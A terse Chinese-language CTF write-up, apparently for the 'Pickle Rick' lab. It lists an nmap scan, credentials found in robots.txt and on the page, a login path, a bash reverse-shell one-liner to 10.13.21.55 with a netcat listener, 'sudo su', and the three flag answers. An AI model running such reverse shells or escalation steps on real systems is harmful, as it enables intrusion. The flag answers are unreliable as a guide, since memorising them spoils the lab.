今天來解的題目比較不是尋找公開 Exploit 的方式,而是要靠自己在網頁上尋寶(?),來取得進一步的權限,也比較像 CTF 通靈的題目。
nmap -A 10.10.223.99
R1ckRul3s
robots.txt
Wubbalubbadubdub
/login.php
就可以進入登入
R1ckRul3s
Wubbalubbadubdub
bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'
nc -vlk 7877
mr. meeseek hair
1 jerry tear
sudo su
fleeb juice